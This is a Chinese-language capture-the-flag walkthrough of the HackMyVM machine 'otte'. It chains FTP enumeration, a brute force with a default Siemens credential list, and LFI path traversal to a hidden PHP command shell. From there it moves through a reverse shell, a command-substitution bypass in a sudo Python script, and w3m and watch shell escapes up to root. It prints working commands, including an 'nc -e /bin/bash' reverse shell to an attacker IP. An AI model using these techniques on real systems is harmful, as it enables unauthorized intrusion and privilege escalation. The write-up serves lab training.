49.otte
1. 基本信息^toc
2. 信息收集
┌──(root㉿kali)-[~/Desktop/hmv/otte]
└─# nmap 192.168.56.27 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-27 21:48 EST
Nmap scan report for 192.168.56.27
Host is up (0.00087s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:84:B9:A1 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 2.47 seconds
2.1. ftp匿名登录
┌──(root㉿kali)-[~/Desktop/hmv/otte]
└─# ftp 192.168.56.27
Connected to 192.168.56.27.
220 ProFTPD Server (Debian) [::ffff:192.168.56.27]
Name (192.168.56.27:root): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
226 Transfer complete
ftp> ls -la
229 Entering Extended Passive Mode (|||64320|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x 2 ftp ftp 4096 May 15 2021 .
drwxr-xr-x 2 ftp ftp 4096 May 15 2021 ..
-rw-r--r-- 1 ftp ftp 89 May 15 2021 note.txt
226 Transfer complete
ftp> get note.txt
local: note.txt remote: note.txt
229 Entering Extended Passive Mode (|||5844|)
150 Opening BINARY mode data connection for note.txt (89 bytes)
89 250.47 KiB/s
226 Transfer complete
89 bytes received in 00:00 (92.55 KiB/s)
ftp> exit
221 Goodbye.
┌──(root㉿kali)-[~/Desktop/hmv/otte]
└─# cat note.txt
Hi thomas ! I put on you personal folder the php code you asked me !
See you later +++
这里获用户 thomas 而且告诉我们他的文件夹里面有一个PHP文件
2.2. 爆破网站登录密码
网站需要验证身份
注意
由于这个靶机有点老,而且是老外出的。所以这里的提示框会缺失提示信息,
需要用老版本的浏览器才能显示
这里给大家分享一个浏览器,用这个浏览器就会显示提示信息
https://www.playbook.com/s/yurain/au1fnEHuEk3DvD7zKVV4K9d8
访问网站会给我们提示 “Siemens - Root authentification”
那这里很可能就是西门子设备的默认账号密码
常见的设备账面密码可以在这里查询(国内的比较全,西门子的我试了一下 这里面没有正确的)
后面在这里获取到了一个常用的西门子默认账号密码表
https://www.192-168-1-1-ip.co/router/siemens/siemens/17622/
| 账号 | 密码 |
|---|---|
| admin | admin |
| (blank) | admin |
| admin | (blank) |
| (blank) | (blank) |
| admin | |
| superuser | admin |
| 31994 | 31994 |
| login | admin |
| (blank) | 0000 |
| (blank) | |
| Administrator | Password |
| WinCCAdmin | 2WSXcder |
| (blank) | uboot |
| Administrator | Administrator |
| admin | BSNL1234 |
| Level 2 OEM | 6000 |
| 4712 | |
| admin | pwp |
| SKY_FOX | |
| (blank) | 123456 |
| admin | |
| 2 | 2 |
| 254 | admin |
| (blank) | SKY_FOX |
| Hardcoded password | Basisk |
| user | user |
| root | zP2wxY4uE |
| 642935177 | |
| basisk | basisk |
| poll | tech |
| 123456 |
burp爆破一下就能获取到密码,这里要对payload进行base64编码
解码后的密码 root:zP2wxY4uE
登录成功后会获取到一张图片
图片并没有隐藏什么信息
2.3. 目录爆破
这里爆破命令也需要进行Basic认证
┌──(root㉿kali)-[~/Desktop/hmv/otte]
└─# gobuster dir -U root -P zP2wxY4uE -u http://192.168.56.27 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.27
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Auth User: root
[+] Extensions: php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 278]
/index.php (Status: 200) [Size: 28]
/image (Status: 200) [Size: 47076]
/config.php (Status: 200) [Size: 0]
/thinkgeek.php (Status: 200) [Size: 28]
获取到了一个路径 thinkgeek.php,访问后还是首页的那张照片
┌──(root㉿kali)-[~/Desktop/hmv/otte]
└─# curl http://192.168.56.27/thinkgeek.php -H "Authorization: Basic cm9vdDp6UDJ3eFk0dUU"
<img src="image.jpg" alt="">
2.4. 参数爆破
使用arjun爆破出参数 file
┌──(root㉿kali)-[~/Desktop/hmv/otte]
└─# arjun -u http://192.168.56.27/thinkgeek.php --headers "Authorization: Basic cm9vdDp6UDJ3eFk0dUU"
_
/_| _ '
( |/ /(//) v2.2.7
_/
[*] Scanning 0/1: http://192.168.56.27/thinkgeek.php
[*] Probing the target for stability
[*] Analysing HTTP response for anomalies
[*] Logicforcing the URL endpoint
[✓] parameter detected: file, based on: body length
[+] Parameters found: file
根据参数就能猜测出这里大概率是一个LFI
┌──(root㉿kali)-[~/Desktop/hmv/otte]
└─# curl http://192.168.56.27/thinkgeek.php?file=../../../../../../etc/passwd -H "Authorization: Basic cm9vdDp6UDJ3eFk0dUU"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
thomas:x:1000:1000:thomas,,,:/home/thomas:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false
proftpd:x:107:65534::/run/proftpd:/usr/sbin/nologin
ftp:x:108:65534::/srv/ftp:/usr/sbin/nologin
laetitia:x:1001:1001:,,,:/home/laetitia:/bin/bash
cedric:x:1002:1002:,,,:/home/cedric:/bin/bash
测试出来也是一个LFI
然后尝试读取私钥但是没有权限。
根据提示告诉我们 thomas 用户目录下有一个php文件很重要,我们将其爆破出来
┌──(root㉿kali)-[~/Desktop/hmv/otte]
└─# ffuf -u http://192.168.56.27/thinkgeek.php?file=../../../../../../home/thomas/FUZZ.php -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -H "Authorization: Basic cm9vdDp6UDJ3eFk0dUU" |grep -v "Size: 0"
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://192.168.56.27/thinkgeek.php?file=../../../../../../home/thomas/FUZZ.php
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Header : Authorization: Basic cm9vdDp6UDJ3eFk0dUU
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
shell [Status: 200, Size: 20, Words: 3, Lines: 3, Duration: 11ms]
发现一个 shell.php
┌──(root㉿kali)-[~/Desktop/tools]
└─# curl http://192.168.56.27/thinkgeek.php?file=../../../../../../../home/thomas/shell.php -H "Authorization: Basic cm9vdDp6UDJ3eFk0dUU"
Have fun !<br><br>
爆破一下参数
┌──(root㉿kali)-[~/Desktop/hmv/otte]
└─# ffuf -u "http://192.168.56.27/thinkgeek.php?file=../../../../../../home/thomas/shell.php&FUZZ=whoami" -w /usr/share/wordlists/parameter.txt -H "Authorization: Basic cm9vdDp6UDJ3eFk0dUU" |grep -v "Size: 20"
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://192.168.56.27/thinkgeek.php?file=../../../../../../home/thomas/shell.php&FUZZ=whoami
:: Wordlist : FUZZ: /usr/share/wordlists/parameter.txt
:: Header : Authorization: Basic cm9vdDp6UDJ3eFk0dUU
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
file [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 3ms]
command [Status: 200, Size: 29, Words: 3, Lines: 4, Duration: 398ms]
:: Progress: [5846/5846] :: Job [1/1] :: 956 req/sec :: Duration: [0:00:06] :: Errors: 0 ::
注意
这里由于前面已经使用了一个参数file了,要爆破另外一个参数只能用&
而且arjun好像不能爆破双参数的这种。这里我选择用ffuf爆破
爆破出参数是 command
┌──(root㉿kali)-[~/Desktop/hmv/otte]
└─# curl "http://192.168.56.27/thinkgeek.php?file=../../../../../../../home/thomas/shell.php&command=whoami" -H "Authorization: Basic cm9vdDp6UDJ3eFk0dUU"
Have fun !<br><br>
www-data
然后反弹shell即可
┌──(root㉿kali)-[~/Desktop/hmv/otte]
└─# pwncat-cs -lp 1234
[01:15:41] Welcome to pwncat 🐈! __main__.py:164
[01:17:04] received connection from 192.168.56.27:44386 bind.py:84
[01:17:04] 192.168.56.27:44386: registered new host w/ db manager.py:957
(local) pwncat$
(remote) www-data@otte:/var/www/html$ whoami
www-data
3. 提权到thomas
3.1. 恢复文件签名
在 thomas 目录下有一个提示
(remote) www-data@otte:/home/thomas$ cat nightmare.txt
who is the son of a bitch who replaced the signature on my file with fucking XXX?! I need to find the original signature!
翻译:是谁这个混蛋把我文件的签名替换成了该死的 XXX?!我需要找到原来的签名!
意思是我们要恢复一个文件的签名,而这个文件就是同目录下的 important_file
(remote) www-data@otte:/home/thomas$ head important_file
00000000: XXXXXXXXXXXXXXXX 0000 000d 4948 4452 .XXX........IHDR
00000010: 0000 012c 0000 012c 0806 0000 0079 7d8e ...,...,.....y}.
00000020: 7500 0000 1b74 4558 7443 7265 6174 696f u....tEXtCreatio
00000030: 6e20 5469 6d65 0031 3632 3130 3037 3337 n Time.162100737
00000040: 3935 3239 15fc b9e2 0000 37e9 4944 4154 9529......7.IDAT
00000050: 78da ed9d 8bab 7ecf 55de f38f 168a 2085 x.....~.U..... .
00000060: 2214 410a 2208 2294 8214 4428 8582 286a ".A."."...D(..(j
00000070: bd50 898a d6b6 62b0 28a2 a849 9a18 a3b9 .P....b.(..I....
00000080: 7889 a931 3626 8d9a 8ba6 8947 3e5f ddb8 x..16&.....G>_..
00000090: ddee 99f5 ccac 35b3 67ef 773d 3090 7c7f ......5.g.w=0.|.
可以发现签名的文件头变成了XXXX
但是经常玩CTF 杂项的师傅肯定就可以发现第一行有一个 IHDR 这个经常在Png图片里面出现
然后只需要找一个png图片提取出它前面的16进制替换掉即可
8950 4E47 0D0A 1A0A
然后导出即可
导出后可以得到一张二维码
解析后获取到一个网站 https://eqrcode.co/a/SVxQdM
访问网站可以获取到thomas账户的密码 thomas:youareonthegoodwaybro
4. 提权到laetitia用户
thomas@otte:~$ sudo -l
Matching Defaults entries for thomas on otte:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User thomas may run the following commands on otte:
(laetitia) NOPASSWD: /usr/bin/python3 /home/laetitia/simpler.py *
4.1. 代码审计
观察代码在 exec_ping 处发现了可以利用的地方
thomas@otte:~$ cat /home/laetitia/simpler.py
...
def exec_ping():
forbidden = ['&', ';', '-', '`', '||', '|']
command = input('Enter an IP: ')
for i in forbidden:
if i in command:
print('Got you')
exit()
os.system('ping ' + command)
这里没有过滤 $ ,导致我们可以使用 命令替换语法$(...) 进行绕过
我们先写一个反弹shell的脚本
thomas@otte:/tmp$ echo 'nc -e /bin/bash 192.168.56.6 2233' >shell.sh
然后执行脚本反弹shell实现提权
thomas@otte:/tmp$ sudo -u laetitia /usr/bin/python3 /home/laetitia/simpler.py -p
***********************************************
_ _
___(_)_ __ ___ _ __ | | ___ _ __ _ __ _ _
/ __| | '_ ` _ \| '_ \| |/ _ \ '__| '_ \| | | |
\__ \ | | | | | | |_) | | __/ |_ | |_) | |_| |
|___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
|_| |_| |___/
@ironhackers.es
***********************************************
Enter an IP: $(bash /tmp/shell.sh)
┌──(root㉿kali)-[~/Desktop/hmv/otte]
└─# pwncat-cs -lp 2233
(local) pwncat$
(remote) laetitia@otte:/tmp$ whoami
laetitia
5. 提权到cedric用户
(remote) laetitia@otte:/tmp$ sudo -l
Matching Defaults entries for laetitia on otte:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User laetitia may run the following commands on otte:
(cedric) NOPASSWD:
这里有一个文件读取,
但是w3m的交互模式是可以执行命令的
利用交换模式提权即可
(remote) laetitia@otte:/home/laetitia/.w3m$ sudo -u cedric /usr/bin/w3m "/etc/passwd"
进去后 执行 !bash
cedric@otte:/home/laetitia/.w3m$ whoami
cedric
(remote) cedric@otte:/home/cedric$ cat user.txt
e1e4e2e00a00df7b40c5436155ab4996
6. 提权到root
进来后有一个id_rsa
(remote) cedric@otte:/home/cedric$ ls
id_rsa user.txt
发现是root的私钥
┌──(root㉿kali)-[~/Desktop/hmv/otte]
└─# chmod 600 id_rsa
┌──(root㉿kali)-[~/Desktop/hmv/otte]
└─# ssh-keygen -y -f id_rsa
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzc3fvk0OLTl7Mx2VF6cr9A6AfAIV05BjNmrBnJ+lxNtP4fYzYjnvxNDtv3lbeLHsyuZD6C29nPCpvi7hUdX5tjjt5e8aFcH5Wtu1zOouXjs8RV6tCUBp433igqXwbVl1WKeQ7vYO+yuqBBacJNkXPU0e0ROwXBFWDklOYwSvnRW6Yi3VK7MQueQgP+3+ajLnwpmpOxndi3hCNwOppUlDNhEm6f8rJ4zatAXPP5SMIp6/P3c98Qjn0zHdkI7t3kL6HU5uGwQsQi3WJGz18YavwyjXHSlQLlwhTDGgOSQ6zpx4WJ7iY7mK/dL1c7CNoF115rpgqHyFJQCdlvsgIJ9jN root@otte
直接ssh上去即可
root@otte:~# cat root.txt
84decf19261819687b63c8210cd28f7c
6.1. 另外一种方案提权root
(remote) cedric@otte:/home/cedric$ sudo -l
Matching Defaults entries for cedric on otte:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User cedric may run the following commands on otte:
(ALL : ALL) NOPASSWD: /usr/bin/mmwatch
mmwatch 实际上就是一个python脚本,他调用了 watch 程序,我们可以利用 watch 的提权方式用它进行提权
sudo -u root mmwatch -x "sh -c 'reset; exec sh 1>&0 2>&0'"
(remote) root@otte:/home/cedric$ id
uid=0(root) gid=0(root) groups=0(root)